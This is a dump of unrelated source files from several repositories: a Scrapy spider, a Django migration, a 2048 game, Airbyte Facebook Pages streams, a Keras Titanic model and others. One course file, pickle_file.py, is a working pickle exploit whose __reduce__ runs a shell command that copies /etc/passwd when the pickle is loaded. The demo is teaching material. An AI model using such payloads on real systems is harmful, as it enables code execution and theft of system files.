return [Request(url=manURL,meta=deliver_param, cookies=self.cookieValue, headers=self.hearders,
callback=self.parse_categories)]
else:
pass
def parse_categories(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
categoriesTexts = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/text()').extract()
categoriesUrls = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/@href').extract()
#http://www.zujuan.com/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1
categories = dict(zip(categoriesTexts, categoriesUrls))
print(123,categories)
categories_list = []
# print(categories)# {'一年级上册': '/question?categories=25572&bookversion=25571&nianji=25572&chid=3&xd=1', '一年级下册': '/question?categories=25573&bookversion=25571&nianji=25573&chid=3&xd=1', '二年级上册': '/question?categories=25574&bookversion=25571&nianji=25574&chid=3&xd=1', '二年级下册': '/question?categories=25575&bookversion=25571&nianji=25575&chid=3&xd=1', '三年级上册': '/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1', '三年级下册': '/question?categories=25577&bookversion=25571&nianji=25577&chid=3&xd=1', '四年级上册': '/question?categories=25578&bookversion=25571&nianji=25578&chid=3&xd=1', '四年级下册': '/question?categories=25579&bookversion=25571&nianji=25579&chid=3&xd=1', '五年级上册': '/question?categories=25580&bookversion=25571&nianji=25580&chid=3&xd=1', '五年级下册': '/question?categories=25581&bookversion=25571&nianji=25581&chid=3&xd=1', '六年级上册': '/question?categories=25582&bookversion=25571&nianji=25582&chid=3&xd=1', '六年级下册': '/question?categories=25592&bookversion=25571&nianji=25592&chid=3&xd=1'}
for text in categories:
categories_list.append(text)
comment = 0
while comment < len(categories_list):
text = categories_list[comment]
nianjiContentUrl = self.domain + categories[text]
print(12,nianjiContentUrl)
nianjiContentUrl =self.domain+categories[text]
comment += 1
response.meta['nianji'] = text
yield Request(url=nianjiContentUrl,meta=response.meta,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories_content)
def parse_categories_content(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
sectionsText = resu.xpath('//div[@id="J_Tree"]/div/a/text()').extract()
sectionsUrl = resu.xpath('//div[@id="J_Tree"]/div/a/@href').extract()
sections = dict(zip(sectionsText,sectionsUrl))
print(sections)
self.make_file()
sections_Text = []
sections_number = []
for text in sections:
sections_Text.append(text)
categoriesNumber = sections[text]
print(type(categoriesNumber),categoriesNumber)
ret = re.findall(r'categories=(\d*)&',categoriesNumber)
sections_number.append(ret[0])
print(123, ret)
need_sections_dict = dict(zip(sections_Text, sections_number))
nianji = response.meta ['nianji']
response.meta[nianji] = need_sections_dict
need_sections_str = str(response.meta)
with open('d:\\xiti10001\\zujuan\\{0}\\{1}\\categories_english_{0}.txt'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name),'a') as f:
f.write(need_sections_str)
f.write('\n')
# categoriesNumber_s = categoriesNumber.find('=')
# print(categoriesNumber_s)
# categoriesNumber_e = categoriesNumber.find('&')
# print(categoriesNumber_e)
# categoriesNumbers = categoriesNumber[categoriesNumber_s,categoriesNumber_e]
def make_file(self):
path = 'd:\\xiti10001\\zujuan\\{0}\\{1}'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name)
        # Create the output directory only if it does not already exist.
        if not os.path.exists(path):
            os.makedirs(path)
| [
"[email protected]"
]
| |
cb983a155f9e7664086637e86eac8576ef2b6efb | 9b991a23f3d7df0de43132233b978b0ffb415c6e | /course3/pickle/pickle_file.py | a6de8139cd7c6ff2538d84242a034c69399b0ad7 | []
| no_license | mycguo/python-deepdive | cdc0fa6cf50728c58a8a8836f2f2800e7fdd7fb7 | 37b181470e80a94fa6db5b237fb7de521130905d | refs/heads/master | 2022-12-14T15:58:00.973247 | 2020-09-12T03:38:14 | 2020-09-12T03:38:14 | 289,349,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | import os
import pickle
class Exploit():
def __reduce__(self):
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
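# __reduce__ tells pickle how to rebuild the object on load: it returns
# "call os.system(<shell command>)", so merely unpickling the payload
# executes the command -- the classic pickle-deserialization RCE demo.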
def serialize_exploit(fname):
with open(fname, 'wb') as f:
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb'))
| [
"[email protected]"
]
| |
e04c76ee7cd3d8b1f62e00662a715d5ab09713dc | 926a9065a4fc220d022c8d7edcc4c01d1a4587f8 | /products/migrations/0039_auto_20200613_1112.py | e831c7857073ca1067ff482093967e12c0069745 | []
| no_license | singham3/electrotrade | 6b1ac38fe68f34b1bc6bd074e10271f1a94f75d7 | 2d1c4f1d5a4672c31cca0d4478b77ae134bb43d5 | refs/heads/master | 2022-11-20T22:07:16.588433 | 2020-07-24T14:31:03 | 2020-07-24T14:31:03 | 268,452,091 | 0 | 1 | null | 2020-07-19T20:20:51 | 2020-06-01T07:19:04 | Python | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.3 on 2020-06-13 11:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0038_auto_20200613_1108'),
]
operations = [
migrations.AlterField(
model_name='orderid',
name='order_id',
field=models.IntegerField(default=54268140),
),
]
| [
"[email protected]"
]
| |
d425f088b08116e205b3ffe26d9c77b5c1e4e38d | e04ce35fd36785c3695f3107de262f1db13bdc00 | /2048.py | aa81421376af01b7b62722748fa542018b1195d5 | []
| no_license | Timurbl/game_2048 | edd6b6082263f7cab9c9a1ba777b3730b87b0c5b | ef5cccc75766b524eed2260111e9b092e9366538 | refs/heads/master | 2020-03-26T06:55:34.730690 | 2018-08-13T20:05:58 | 2018-08-13T20:05:58 | 144,628,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | from tkinter import *
from logic2048 import Game
N = 4
color = {'' : 'light gray',
2 : 'pink',
4 : 'red',
8 : 'orange',
16: 'yellow',
32: 'light blue',
64: 'blue',
128: 'light green',
256: 'green'}
def left(event):
game.left()
draw(game)
if game.game_over():
print('GAME OVER')
def right(event):
game.right()
draw(game)
if game.game_over():
print('GAME OVER')
def up(event):
game.up()
draw(game)
if game.game_over():
print('GAME OVER')
def down(event):
game.down()
draw(game)
if game.game_over():
print('GAME OVER')
def draw(game):
for i in range(N):
for j in range(N):
table[i][j]['text'] = game[i][j]
try:
table[i][j]['bg'] = color[game[i][j]]
except KeyError:
table[i][j]['bg'] = 'white'
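                # Tiles above 256 have no entry in the color map and
                # fall back to a white background via this handler.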
root = Tk()
table = [[Label(root, height=2, width=4, font='Arial 24') for i in range(N)] for j in range(N)]
for i in range(N):
for j in range(N):
table[i][j].grid(row=i, column=j)
for i in range(N):
root.grid_rowconfigure(i, pad=10)
root.grid_columnconfigure(i, pad=10)
game = Game()
draw(game)
root.bind('<Left>', left)
root.bind('<Right>', right)
root.bind('<Up>', up)
root.bind('<Down>', down)
root.mainloop() | [
"[email protected]"
]
| |
13f1896c22ae2a9880e175bd288981ebe1216ccf | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py | a436382fa8b13d29f35d97c1b401f0e523a58dd9 | []
| no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.events.logs.models.entries import EventLogEntry
from indico.modules.events.logs.views import WPEventLogs
from indico.modules.events.management.controllers import RHManageEventBase
class RHEventLogs(RHManageEventBase):
"""Shows the modification/action log for the event"""
def _process(self):
entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all()
realms = {e.realm for e in entries}
return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
| [
"[email protected]"
]
| |
08a65bb7db851c3827f50ea795ce9e58ad45c818 | 7eebbfaee45fdc57c4fc6ba32c87c35be1e62b14 | /airbyte-integrations/connectors/source-facebook-pages/source_facebook_pages/streams.py | 717fb1c76800fc295cff19b40b475069c0e2914a | [
"MIT",
"Elastic-2.0"
]
| permissive | Velocity-Engineering/airbyte | b6e1fcead5b9fd7c74d50b9f27118654604dc8e0 | 802a8184cdd11c1eb905a54ed07c8732b0c0b807 | refs/heads/master | 2023-07-31T15:16:27.644737 | 2021-09-28T08:43:51 | 2021-09-28T08:43:51 | 370,730,633 | 0 | 1 | MIT | 2021-06-08T05:58:44 | 2021-05-25T14:55:43 | Java | UTF-8 | Python | false | false | 4,651 | py | #
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from abc import ABC
from typing import Any, Iterable, Mapping, MutableMapping, Optional
import requests
from airbyte_cdk.sources.streams.http import HttpStream
from source_facebook_pages.metrics import PAGE_FIELDS, PAGE_METRICS, POST_FIELDS, POST_METRICS
class FacebookPagesStream(HttpStream, ABC):
url_base = "https://graph.facebook.com/v11.0/"
primary_key = "id"
data_field = "data"
def __init__(
self,
access_token: str = None,
page_id: str = None,
**kwargs,
):
super().__init__(**kwargs)
self._access_token = access_token
self._page_id = page_id
@property
def path_param(self):
return self.name[:-1]
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
data = response.json()
if not data.get("data") or not data.get("paging"):
return {}
return {
"limit": 100,
"after": data.get("paging", {}).get("cursors", {}).get("after"),
}
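    # Cursor-based paging: the "after" cursor from the previous response
    # is passed straight through as a query parameter on the next request.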
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
next_page_token = next_page_token or {}
params = {"access_token": self._access_token, **next_page_token}
return params
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
        if not self.data_field:
            yield response.json()
            # Return early: with an empty data_field the .get("") lookup
            # below would quietly yield nothing, but being explicit is safer.
            return
records = response.json().get(self.data_field, [])
for record in records:
yield record
class Page(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/page/,
"""
data_field = ""
def path(self, **kwargs) -> str:
return self._page_id
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
return None
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(**kwargs)
# we have to define which fields will return from Facebook API
# because FB API doesn't provide opportunity to get fields dynamically without delays
# so in PAGE_FIELDS we define fields that user can get from API
params["fields"] = PAGE_FIELDS
return params
class Post(FacebookPagesStream):
"""
https://developers.facebook.com/docs/graph-api/reference/v11.0/page/feed,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/posts"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(**kwargs)
params["fields"] = POST_FIELDS
return params
class PageInsights(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/page/insights/,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/insights"
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
return None
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params = super().request_params(stream_state, stream_slice, next_page_token)
params["metric"] = ",".join(PAGE_METRICS)
return params
class PostInsights(FacebookPagesStream):
"""
API docs: https://developers.facebook.com/docs/graph-api/reference/post/insights/,
"""
def path(self, **kwargs) -> str:
return f"{self._page_id}/posts"
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params = super().request_params(stream_state, stream_slice, next_page_token)
params["fields"] = f'insights.metric({",".join(POST_METRICS)})'
return params
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
# unique case so we override this method
records = response.json().get(self.data_field) or []
for insights in records:
if insights.get("insights"):
data = insights.get("insights").get("data")
for insight in data:
yield insight
else:
yield insights
| [
"[email protected]"
]
| |
7bbcb9ca9dda54951983837756510a5c06b96ee6 | 3df53a7188586c9e6ae26ebcc2ae788480c2f84a | /src/main2.py | 4bac4c6f4a29927f97706645fb6f3e81324a528e | []
| no_license | webclinic017/f-indicators | b24927a7008bf812fcfc394b39275ea7fb767039 | bfdd34a8e259fee8bce43ac5d0c268820e7bdd90 | refs/heads/master | 2023-08-10T02:58:49.123664 | 2020-05-11T15:31:12 | 2020-05-11T15:31:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | # Import indicators
# Attach them to strategy obj
# Start GA with strategy obj
import logging
import pandas as pd
import numpy as np
from backtesting import Strategy, Backtest
from talib import SMA
from backtesting.lib import crossover
from pathlib import Path, PurePosixPath
from utils import TFConvertor
log = logging.getLogger("GA")
log.setLevel(logging.DEBUG)
path = Path(__file__).parent.resolve().parent
path = path.joinpath("logs/ga.log")
log.addHandler(logging.FileHandler(path.resolve()))
data = pd.read_csv("data_large/EURUSD_Candlestick_1_M_BID_09.05.2018-30.03.2020.csv")
data['Datetime'] = pd.to_datetime(data['Datetime'], format="%d.%m.%Y %H:%M:%S")
# set datetime as index
data = data.set_index('Datetime')
data_loc = data.loc["2017":"2020"]
datatmp = TFConvertor(data_loc, '4H') # It is different for every new individual
class SmaCross(Strategy):
    # Define the four MA lags as *class variables*
# genome:
n1 = 2
n2 = 6
n3 = 10
n4 = 20
price = 'Close'
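    # n1/n2 and n3/n4 are the fast/slow SMA period pairs that the GA is
    # meant to evolve; next() only trades when both pairs cross in the
    # same direction on the same bar.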
def init(self, *args, **kwargs):
# Precompute two moving averages
self.sma1 = self.I(SMA, datatmp["Close"], self.n1)
self.sma2 = self.I(SMA, datatmp["Close"], self.n2)
self.sma3 = self.I(SMA, datatmp["Close"], self.n3)
self.sma4 = self.I(SMA, datatmp["Close"], self.n4)
# self.sma1 = SMA(datatmp["Close"], self.n1)
# self.sma2 = SMA(datatmp["Close"], self.n2)
# self.sma3 = SMA(datatmp["Close"], self.n3)
# self.sma4 = SMA(datatmp["Close"], self.n4)
# Precompute support and resistance using specified function as first input of self.I()
# self.support_resistance = self.I(Pivot5points, self.data, self.sup_res_candles)
def next(self):
# If sma1 crosses above sma2, buy the asset
if crossover(self.sma1, self.sma2) and crossover(self.sma3, self.sma4):
try:
print("Is buying...")
self.buy()
except:
log.error("Something went wrong in buy() function!")
# Else, if sma1 crosses below sma2, sell it
elif crossover(self.sma2, self.sma1) and crossover(self.sma4, self.sma3):
try:
self.sell()
except:
log.error("Something went wrong in sell() function!")
bt = Backtest(datatmp, SmaCross, cash=10000, commission=.02)
result = bt.run()
print(result)
print(np.isnan(result.SQN)) | [
"[email protected]"
]
| |
fa97ee9fd2838b1142288a25b7c3b07d01df9382 | 80f622252281e6288d24b101dda0d4ee3634faed | /Titanic/model/model.py | 92f1eea0ae9e1af59615e0f34f8ec795553013ab | []
| no_license | jalondono/HandsOn-MachineLearning | c7cd7ce967180b84dffc2953d9ad5894c2bfc46e | eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d | refs/heads/master | 2023-01-03T01:10:32.836434 | 2020-10-29T15:47:27 | 2020-10-29T15:47:27 | 300,308,942 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py | import pandas as pd
import numpy as np
import tensorflow.keras as K
import mlflow.tensorflow
import sys
import logging
import zipfile
# mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000
def getting_data(zipfolder, filename, cols):
"""
    Extract a zip archive and load one CSV file from it
    :param zipfolder: path to the zip archive
    :param filename: name of the CSV file to read after extraction
    :param cols: columns to load from the CSV
    :return: loaded dataset
"""
with zipfile.ZipFile(zipfolder, 'r') as zip_ref:
zip_ref.extractall()
data = pd.read_csv(filename, usecols=cols)
print('data set shape: ', data.shape, '\n')
print(data.head())
return data
def process_args(argv):
"""
convert the data arguments into the needed format
:param argv: Parameters
:return: converted parameters
"""
    # Guard each argument on its own index so missing arguments fall back
    # to their defaults instead of raising IndexError; the network default
    # is a string so it goes through the same parsing path.
    data_path = sys.argv[1] if len(sys.argv) > 1 else '../data'
    debug = sys.argv[2].lower() if len(sys.argv) > 2 else 'false'
    model_type = sys.argv[3] if len(sys.argv) > 3 else '[256,128]'
    model_type = model_type[1:-1].split(',')
    splited_network = [int(x) for x in model_type]
    alpha = float(sys.argv[4]) if len(sys.argv) > 4 else 0.5
    l1_ratio = float(sys.argv[5]) if len(sys.argv) > 5 else 0
return data_path, debug, splited_network, alpha, l1_ratio
def create_model(network):
model = K.models.Sequential()
model.add(K.layers.Dense(units=256, input_dim=6,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
for units in network[1:]:
model.add(K.layers.Dense(units=units,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
model.add(K.layers.Dense(units=1, activation='sigmoid'))
opt = K.optimizers.Adam(learning_rate=alpha)
model.compile(optimizer=opt, loss='binary_crossentropy',
metrics=['accuracy'], )
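    # Sigmoid output + binary cross-entropy: the network predicts the
    # probability of survival for each passenger (a single 0/1 label).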
print(model.summary())
return model
def train_model(model, X_train, Y_train, batch_size=128,
epoch=80, val_split=0.1):
"""
Perform the training of the model
:param model: model previously compiled
:return: history
"""
history = model.fit(x=X_train,
y=Y_train,
                        batch_size=batch_size,
                        epochs=epoch,
                        validation_split=val_split)
return history
if __name__ == '__main__':
logging.basicConfig(level=logging.WARN)
logger = logging.getLogger(__name__)
# mlflow
mlflow.tensorflow.autolog()
# Utils cols from data
train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
Y_cols = ['Survived']
# Get value arguments
data_path, debug, network, alpha, l1_ratio = process_args(sys.argv)
# train Data
filename = 'train.csv'
data = getting_data(data_path, filename, train_cols)
data['Sex_b'] = pd.factorize(data.Sex)[0]
data = data.drop(['Sex'], axis=1)
data = data.rename(columns={"Sex_b": "Sex"})
# testing data
filename = 'test.csv'
test = getting_data(data_path, filename, test_cols)
test['Sex_b'] = pd.factorize(test.Sex)[0]
test = test.drop(['Sex'], axis=1)
test = test.rename(columns={"Sex_b": "Sex"})
# filling train na values with mean
column_means = data.mean()
data = data.fillna(column_means)
# filling test na values with mean
column_means = test.mean()
test = test.fillna(column_means)
input_data = np.array(data[X_cols])
label_date = np.array(data[Y_cols])
test_input_data = np.array(test[X_cols])
X_train = input_data
Y_train = label_date
# definition of the model
model = create_model(network)
# training model
history = train_model(model, X_train, Y_train)
# predicting
    # model.predict returns per-sample survival probabilities, not a
    # (loss, accuracy) pair, so label the printed output accordingly.
    predictions = model.predict(test_input_data, batch_size=32, verbose=1)
    print("Predictions shape:", predictions.shape)
    print("First predictions:", predictions[:5].ravel())
| [
"[email protected]"
]
| |
0ac4cdf0dc4d0068c5d28f7e139bf35bbae92bca | c1ed1b90f7e914aee1a17cd9b5bb83cf288f7e85 | /usersAccount/apps.py | 7e257ce953933d0d4ded1fea4b4a19236a69a80c | []
| no_license | tanaychaulinsec/User-authentication | 87e111f3731b57f9057554a58781d1a1705e351c | 6652e72a5b639174cb20ccdae1c49883bdcc8514 | refs/heads/master | 2022-12-12T10:41:25.172936 | 2020-08-25T15:39:00 | 2020-08-25T15:39:00 | 289,565,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | from django.apps import AppConfig
class UsersaccountConfig(AppConfig):
name = 'usersAccount'
| [
"[email protected]"
]
| |
9c5ad899ca1d6c2c86cb40d5304177a1ce2f9f26 | d4945242794561f7e8621b7cace4c7c9d5c9e7ab | /testbucket.py | 4ab9dfdb4c82d77b57b85ee3b0501cd64b75b242 | []
| no_license | synthicap/TestStackBot | b275a9438b786a9201da4f81f57971c732b4272c | 7fbbebdfc953eb05385e028e7569007869e52acc | refs/heads/master | 2021-06-16T08:09:23.898823 | 2017-05-04T21:55:59 | 2017-05-04T21:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,865 | py | import os
import pickle
from secrets import token_urlsafe
import telebot
from flask import Flask, request
from redis import from_url
from telebot.types import Update, ReplyKeyboardMarkup, KeyboardButton
class Task:
is_text = None
text = None
correct = None
class Test:
tasks = []
results = {}
bot = telebot.TeleBot('345467048:AAEFochiYcGcP7TD5JqYwco8E56cOYCydrk')
app = Flask(__name__)
redis = from_url(os.environ['REDIS_URL'])
tests = {}
@bot.message_handler(commands=['start', 'help'])
def start(message):
text = '/new - create new test\n' \
'/pass - pass the test\n' \
'/mres - my result of the test\n' \
'/res - all results of the test\n' \
'/del - delete the test\n'
bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['new'])
def new_test(message):
try:
test = Test()
test.key = token_urlsafe(8)
test.num = int(message.text.split()[-1])
tests['key'] = test
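        # NOTE: the literal 'key' slot means only one test can be under
        # construction at a time; the shareable key lives on the Test
        # object itself.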
bot.send_message(message.chat.id, f'Key: {test.key}')
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
except Exception as e:
bot.reply_to(message, str(e) + ' 0')
def set_task_text(message):
try:
task = Task()
task.is_text = message.content_type == 'text'
if task.is_text:
task.text = message.text
else:
task.text = message.photo[0].file_id
tests['key'].tasks.append(task)
msg = bot.send_message(message.chat.id, 'Enter the task correct answer')
bot.register_next_step_handler(msg, set_task_correct)
'''markup = ReplyKeyboardMarkup(one_time_keyboard=True, row_width=4)
markup.row(KeyboardButton(a) for a in answer)'''
except Exception as e:
bot.reply_to(message, str(e) + ' 2')
def set_task_correct(message):
try:
test = tests['key']
answer = message.text
if answer[0] == ':':
answer = set(answer.split()[1:])
test.tasks[-1].correct = answer
if test.num > 1:
test.num -= 1
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
else:
key = test.key
del test.key
del test.num
del tests['key']
redis[key] = pickle.dumps(test)
bot.send_message(message.chat.id, 'Test successfully created!')
bot.send_message(message.chat.id, str(len(test.tasks)))
except Exception as e:
bot.reply_to(message, str(e) + ' 3')
@bot.message_handler(commands=['pass'])
def get_test(message):
try:
key = message.text.split()[-1]
test = pickle.loads(redis[key])
test.key = key
test.num = len(test.tasks)
test.ctasks = test.tasks.copy()
tests['key'] = test
test.results[message.from_user.username] = 0
bot.send_message(message.chat.id, f'Let\'s start the test, number of tasks: {test.num}')
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
except Exception as e:
bot.reply_to(message, str(e) + ' 1')
def get_task(message):
try:
test = tests['key']
tasks = test.ctasks
name = message.from_user.username
correct = tasks.pop(0).correct
        if isinstance(correct, set):
answer = set(message.text.split())
else:
answer = message.text
test.results[name] += answer == correct
if tasks:
            task = tasks[0]  # next remaining task, not the first task again
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
else:
bot.send_message(message.chat.id, f'Your result is: {test.results[name]} / {test.num}')
key = test.key
del test.key
del test.num
del test.ctasks
del tests['key']
redis[key] = pickle.dumps(test)
except Exception as e:
bot.reply_to(message, str(e) + '3')
@bot.message_handler(commands=['mres'])
def get_result(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
result = test.results[message.from_user.username]
num = len(test.tasks)
bot.send_message(message.chat.id, f'Your result is: {result} / {num}')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['res'])
def get_list_results(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
num = len(test.tasks)
items = test.results.items()
        if items:
bot.send_message(message.chat.id, 'Results:\n' + ''.join(f'{i[0]}: {i[1]} / {num}\n' for i in items))
else:
bot.send_message(message.chat.id, 'No results')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['del'])
def delete_test(message):
try:
        key = message.text.split()[-1]
        redis.delete(key)  # actually remove the stored test from Redis
        bot.send_message(message.chat.id, 'Test successfully deleted!')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@app.route('/update', methods=['POST'])
def update():
bot.process_new_updates([Update.de_json(request.stream.read().decode('utf-8'))])
return '', 200
@app.route('/')
def index():
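    # NB: flushdb() wipes every stored test each time the root URL is visited;
    # presumably this is meant to reset state on (re)deploy.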
redis.flushdb()
bot.remove_webhook()
bot.set_webhook(url='https://teststackbot.herokuapp.com/update')
return '', 200
if __name__ == '__main__':
app.run()
| [
"[email protected]"
]
| |
a4c826fcfe6311083197e85bce0f8017a9af10bf | 3d928362dcde314562c80f83b79552983d4b0b37 | /bert/train/loss_models.py | d6ed29c74db721693b5aae118950c38050d26f6a | [
"Unlicense"
]
| permissive | nawshad/BERT-pytorch | 18a7c949b1a61055ff87399909b30cd978eb8218 | fe45c85846a7d5c5b2668879239f482384940366 | refs/heads/master | 2021-07-09T23:23:45.224286 | 2020-08-23T08:27:50 | 2020-08-23T08:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | from bert.preprocess import PAD_INDEX
from torch import nn
class MLMNSPLossModel(nn.Module):
def __init__(self, model):
super(MLMNSPLossModel, self).__init__()
self.model = model
self.mlm_loss_function = nn.CrossEntropyLoss(ignore_index=PAD_INDEX)
self.nsp_loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
mlm_outputs, nsp_outputs = outputs
mlm_targets, is_nexts = targets
mlm_predictions, nsp_predictions = mlm_outputs.argmax(dim=2), nsp_outputs.argmax(dim=1)
predictions = (mlm_predictions, nsp_predictions)
batch_size, seq_len, vocabulary_size = mlm_outputs.size()
mlm_outputs_flat = mlm_outputs.view(batch_size * seq_len, vocabulary_size)
mlm_targets_flat = mlm_targets.view(batch_size * seq_len)
mlm_loss = self.mlm_loss_function(mlm_outputs_flat, mlm_targets_flat)
nsp_loss = self.nsp_loss_function(nsp_outputs, is_nexts)
loss = mlm_loss + nsp_loss
return predictions, loss.unsqueeze(dim=0)
class ClassificationLossModel(nn.Module):
def __init__(self, model):
super(ClassificationLossModel, self).__init__()
self.model = model
self.loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
predictions = outputs.argmax(dim=1)
loss = self.loss_function(outputs, targets)
return predictions, loss.unsqueeze(dim=0)
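# Rough usage sketch (names and tensor shapes are assumptions inferred from the
# forward passes above, not part of this module):
#   loss_model = MLMNSPLossModel(bert_model)
#   (mlm_pred, nsp_pred), loss = loss_model(inputs, (mlm_targets, is_nexts))
#   # mlm_targets: (batch, seq_len) token ids; is_nexts: (batch,) 0/1 labels
#   loss.mean().backward()  # loss has shape (1,) because of unsqueeze(dim=0)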
| [
"[email protected]"
]
| |
248ae932e96969c1f76bce884663f4cd1e7fdccd | 1238ad2367cbf51246ef21216f3f77398a963268 | /Machine-Learning/scikit-learn/senkei_sample_1.py | 7e4d9f5141874b128205167273934a3a25a2f113 | []
| no_license | shiro16/sunaba | 91c8fb58802993cf428bd2833c4417a234161e49 | 83d62c51a5c35d02cf93de38f6ebf4ab451816e0 | refs/heads/master | 2023-01-28T02:05:01.146155 | 2021-05-11T06:34:36 | 2021-05-11T06:34:36 | 84,282,959 | 0 | 0 | null | 2023-01-08T00:14:46 | 2017-03-08T05:42:13 | Python | UTF-8 | Python | false | false | 560 | py | import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
# generate data using random numbers
np.random.seed(0)
regdata = datasets.make_regression(100, 1, noise=20.0)
# train the model and display its parameters
lin = linear_model.LinearRegression()
lin.fit(regdata[0], regdata[1])
print("coef and intercept : ", lin.coef_, lin.intercept_)
print("score :", lin.score(regdata[0], regdata[1]))
# plot
xr = [-2.5, 2.5]
plt.plot(xr, lin.coef_ * xr + lin.intercept_)
plt.scatter(regdata[0], regdata[1])
plt.show()
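# Quick sanity check of the fitted line (hypothetical input):
# print(lin.predict([[0.5]]))  # should be close to coef_ * 0.5 + intercept_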
| [
"[email protected]"
]
| |
3d1e771da9ec0f32bfd297a1b19794e9054adce4 | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/45/sol.py | 3db6f97188dd189aef4c4caf07b43524d9f7f299 | []
| no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 2,156 | py |
10-lines C++ (16ms) / Python BFS Solutions with Explanations
https://leetcode.com/problems/jump-game-ii/discuss/18019
* Lang: python3
* Author: jianchao-li
* Votes: 71
